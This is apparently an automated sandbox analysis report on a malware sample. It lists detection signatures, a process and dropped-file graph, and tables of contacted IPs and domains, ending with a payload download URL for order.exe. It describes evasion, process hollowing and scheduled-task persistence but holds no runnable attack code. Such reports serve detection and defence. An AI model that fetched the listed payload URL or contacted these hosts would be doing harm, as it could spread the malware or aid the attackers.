Source: Yara match File source: C:\Users\user\AppData\Roaming\svchos.exe, type: DROPPED
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.22.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.22.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.22.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.22.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.22.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\svchos.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417077 Sample: rU6YAgkoAw.exe Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 78 leetboy.dynuddns.net 2->78 80 windowsupdatebg.s.llnwi.net 2->80 82 4 other IPs or domains 2->82 98 Multi AV Scanner detection for domain / URL 2->98 100 Found malware configuration 2->100 102 Malicious sample detected (through community Yara rule) 2->102 106 12 other signatures 2->106 10 rU6YAgkoAw.exe 15 6 2->10         started        14 svchos.exe 2->14         started        signatures3 104 Uses dynamic DNS services 78->104 process4 dnsIp5 84 93.123.39.68, 49699, 80 NET1-ASBG Bulgaria 10->84 72 C:\Users\user\AppData\...\tmpAADD.tmp.exe, PE32 10->72 dropped 16 tmpAADD.tmp.exe 4 10->16         started        file6 process7 file8 56 C:\Users\user\AppData\...\svchost (3).exe, PE32+ 16->56 dropped 58 C:\Users\user\AppData\Local\Temp\start.exe, PE32 16->58 dropped 60 C:\Users\user\AppData\Local\Temp\build.exe, PE32 16->60 dropped 94 Antivirus detection for dropped file 16->94 96 Machine Learning detection for dropped file 16->96 20 build.exe 179 16->20         started        24 start.exe 16->24         started        26 svchost (3).exe 2 16->26         started        signatures9 process10 file11 62 C:\Users\user\AppData\Local\...\vulkan-1.dll, PE32+ 20->62 dropped 64 C:\Users\user\AppData\...\vk_swiftshader.dll, PE32+ 20->64 dropped 66 C:\Users\user\AppData\Local\Temp\...\main.exe, PE32+ 20->66 dropped 70 13 other files (8 malicious) 20->70 dropped 108 Multi AV Scanner detection for dropped file 20->108 110 Drops large PE files 20->110 28 main.exe 20->28         started        68 C:\Users\user\AppData\Roaming\svchos.exe, PE32 24->68 dropped 112 Antivirus detection for dropped file 24->112 114 Machine Learning detection for dropped file 24->114 116 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 24->116 33 cmd.exe 24->33         started        35 cmd.exe 24->35         started        118 Writes to foreign memory regions 26->118 120 Allocates memory in foreign processes 26->120 122 Sample uses process hollowing technique 26->122 124 Injects a PE file into a foreign processes 26->124 37 RegSvcs.exe 1 2 26->37         started        39 WerFault.exe 26->39         started        signatures12 process13 dnsIp14 86 cosmicdust.zip 192.236.232.25 HOSTWINDSUS United States 28->86 88 rentry.co 104.21.95.148 CLOUDFLARENETUS United States 28->88 90 cosmoplanets.net 172.67.142.111 CLOUDFLARENETUS United States 28->90 74 C:\Users\user\AppData\Roaming\...\Updater.exe, PE32 28->74 dropped 126 Drops executable to a common third party application directory 28->126 41 main.exe 28->41         started        43 main.exe 28->43         started        128 Uses schtasks.exe or at.exe to add and modify task schedules 33->128 45 conhost.exe 33->45         started        47 schtasks.exe 33->47         started        49 svchos.exe 35->49         started        52 conhost.exe 35->52         started        54 timeout.exe 35->54         started        92 blue.o7lab.me 94.156.66.112 TERASYST-ASBG Bulgaria 37->92 file15 signatures16 process17 dnsIp18 76 leetboy.dynuddns.net 185.196.11.223 SIMPLECARRIERCH Switzerland 49->76
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
93.123.39.68
 unknown Bulgaria
43561 NET1-ASBG false
94.156.66.112
 blue.o7lab.me Bulgaria
31420 TERASYST-ASBG false
192.236.232.25
 cosmicdust.zip United States
54290 HOSTWINDSUS false
172.67.142.111
 cosmoplanets.net United States
13335 CLOUDFLARENETUS false
104.21.95.148
 rentry.co United States
13335 CLOUDFLARENETUS false
185.196.11.223
 leetboy.dynuddns.net Switzerland
42624 SIMPLECARRIERCH true

Contacted Domains

Name IP Active
rentry.co 104.21.95.148 true
cosmicdust.zip 192.236.232.25 true
cosmoplanets.net 172.67.142.111 true
blue.o7lab.me 94.156.66.112 true
leetboy.dynuddns.net 185.196.11.223 true
windowsupdatebg.s.llnwi.net 69.164.0.128 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://93.123.39.68/order.exe false
  • Avira URL Cloud: malware
 unknown